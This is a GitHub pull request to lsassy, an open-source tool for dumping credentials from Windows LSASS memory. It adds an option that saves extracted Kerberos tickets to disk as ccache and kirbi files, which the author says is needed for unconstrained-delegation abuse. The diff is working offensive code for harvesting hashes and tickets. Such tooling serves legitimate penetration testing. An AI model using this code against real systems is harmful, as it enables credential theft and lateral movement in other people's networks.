### PR TITLE
Add new option "Save kerberos tickets to a directory"

### DIFF
--- a/lsassy/console.py
+++ b/lsassy/console.py
@@ -49,6 +49,7 @@ def main():
                                  '(128 or 256 bits)')
 
     group_out = parser.add_argument_group('output')
+    group_out.add_argument('-K', '--kerberos-dir', action='store', help='Save kerberos tickets to a directory')
     group_out.add_argument('-o', '--outfile', action='store', help='Output credentials to file')
     group_out.add_argument('-f', '--format', choices=["pretty", "json", "grep"], action='store', default="pretty",
                            help='Output format (Default pretty)')

--- a/lsassy/core.py
+++ b/lsassy/core.py
@@ -128,6 +128,7 @@ class TLsassy(threading.Thread):
                 dump_path += "\\"
 
         parse_only = self.args.parse_only
+        kerberos_dir = self.args.kerberos_dir
 
         if parse_only and (dump_path is None or self.args.dump_name is None):
             logging.error("--dump-path and --dump-name required for --parse-only option")
@@ -177,7 +178,7 @@ class TLsassy(threading.Thread):
                     logging.error("Unable to open lsass dump.")
                     exit(1)
 
-            credentials = Parser(file).parse(parse_only=parse_only)
+            credentials = Parser(file).parse(parse_only=parse_only,kerberos_dir=kerberos_dir)
             file.close()
 
             if not parse_only:

--- a/lsassy/core.py
+++ b/lsassy/core.py
@@ -16,7 +16,7 @@ lock = threading.RLock()
 
 class Lsassy:
     def __init__(self, targets, arguments):
-        self.targets = targets
+        self.targets = get_targets(targets)
         self.arguments = arguments
         self.threads = []
         self.max_threads = arguments.threads
@@ -178,7 +178,7 @@ class TLsassy(threading.Thread):
                     logging.error("Unable to open lsass dump.")
                     exit(1)
 
-            credentials = Parser(file).parse(parse_only=parse_only,kerberos_dir=kerberos_dir)
+            credentials, tickets = Parser(file).parse()
             file.close()
 
             if not parse_only:
@@ -192,11 +192,12 @@ class TLsassy(threading.Thread):
                 exit(1)
 
             with lock:
-                Writer(credentials).write(
+                Writer(credentials, tickets).write(
                     self.args.format,
                     output_file=self.args.outfile,
                     quiet=self.args.quiet,
-                    users_only=self.args.users
+                    users_only=self.args.users,
+                    kerberos_dir=kerberos_dir
                 )
 
         except KeyboardInterrupt:

--- a/lsassy/parser.py
+++ b/lsassy/parser.py
@@ -9,23 +9,25 @@ class Parser:
     """
     Parse remote lsass dump file using impacketfile and pypykatz
     """
+
     def __init__(self, dumpfile):
         self._dumpfile = dumpfile
 
-    def parse(self,kerberos_dir,parse_only=False):
+    def parse(self):
         """
         Parse remote dump file and delete it after parsing
         :return: List of Credentials
         """
         credentials = []
+        tickets = []
         try:
             pypy_parse = pypykatz.parse_minidump_external(self._dumpfile)
         except Exception as e:
             logging.error("An error occurred while parsing lsass dump", exc_info=True)
-            print(self._dumpfile.read(10))
             return None
 
-        ssps = ['msv_creds', 'wdigest_creds', 'ssp_creds', 'livessp_creds', 'kerberos_creds', 'credman_creds', 'tspkg_creds']
+        ssps = ['msv_creds', 'wdigest_creds', 'ssp_creds', 'livessp_creds', 'kerberos_creds', 'credman_creds',
+                'tspkg_creds']
         for luid in pypy_parse.logon_sessions:
 
             for ssp in ssps:
@@ -40,21 +42,17 @@ class Parser:
                     if NThash is not None:
                         NThash = NThash.hex()
                     if username and (password or NThash or LMHash):
-                        credentials.append(Credential(ssp=ssp, domain=domain, username=username, password=password, lmhash=LMHash, nthash=NThash))
+                        credentials.append(
+                            Credential(ssp=ssp, domain=domain, username=username, password=password, lmhash=LMHash,
+                                       nthash=NThash))
 
-        if kerberos_dir:
-            dir = os.path.abspath(kerberos_dir)
-            logging.success("Writing kerberos tickets to %s" % dir)
-            ccache_filename = '%s.ccache' % (os.urandom(4).hex()) #to avoid collisions
-            pypy_parse.kerberos_ccache.to_file(os.path.join(dir, ccache_filename))
-            for luid in pypy_parse.logon_sessions:
-                for kcred in pypy_parse.logon_sessions[luid].kerberos_creds:
-                    for ticket in kcred.tickets:
-                        ticket.to_kirbi(dir)
+            for kcred in pypy_parse.logon_sessions[luid].kerberos_creds:
+                for ticket in kcred.tickets:
+                    tickets.append(ticket)
 
-            for cred in pypy_parse.orphaned_creds:
-                if cred.credtype == 'kerberos':
-                    for ticket in cred.tickets:
-                        ticket.to_kirbi(dir)
+        for cred in pypy_parse.orphaned_creds:
+            if cred.credtype == 'kerberos':
+                for ticket in cred.tickets:
+                    tickets.append(ticket)
 
-        return credentials
+        return credentials, tickets

--- a/lsassy/parser.py
+++ b/lsassy/parser.py
@@ -1,4 +1,6 @@
 import logging
+import os
+import ntpath
 from lsassy.credential import Credential
 from pypykatz.pypykatz import pypykatz
 
@@ -10,7 +12,7 @@ class Parser:
     def __init__(self, dumpfile):
         self._dumpfile = dumpfile
 
-    def parse(self, parse_only=False):
+    def parse(self,kerberos_dir,parse_only=False):
         """
         Parse remote dump file and delete it after parsing
         :return: List of Credentials
@@ -39,4 +41,20 @@ class Parser:
                         NThash = NThash.hex()
                     if username and (password or NThash or LMHash):
                         credentials.append(Credential(ssp=ssp, domain=domain, username=username, password=password, lmhash=LMHash, nthash=NThash))
+
+        if kerberos_dir:
+            dir = os.path.abspath(kerberos_dir)
+            logging.success("Writing kerberos tickets to %s" % dir)
+            ccache_filename = '%s.ccache' % (os.urandom(4).hex()) #to avoid collisions
+            pypy_parse.kerberos_ccache.to_file(os.path.join(dir, ccache_filename))
+            for luid in pypy_parse.logon_sessions:
+                for kcred in pypy_parse.logon_sessions[luid].kerberos_creds:
+                    for ticket in kcred.tickets:
+                        ticket.to_kirbi(dir)
+
+            for cred in pypy_parse.orphaned_creds:
+                if cred.credtype == 'kerberos':
+                    for ticket in cred.tickets:
+                        ticket.to_kirbi(dir)
+
         return credentials


### PR DESCRIPTION
Add a little option in the parser to save Kerberos tickets to a directory. This is needed during unconstrained delegation abuse.
I hope this doesn't break the spirit of the v3.0 as I write the tickets inside the parser and not the writer. 

![image](https://user-images.githubusercontent.com/22934796/111516284-053fc500-8754-11eb-8dce-5c139cc5c4ea.png)

Let me know if I need to find another solution :)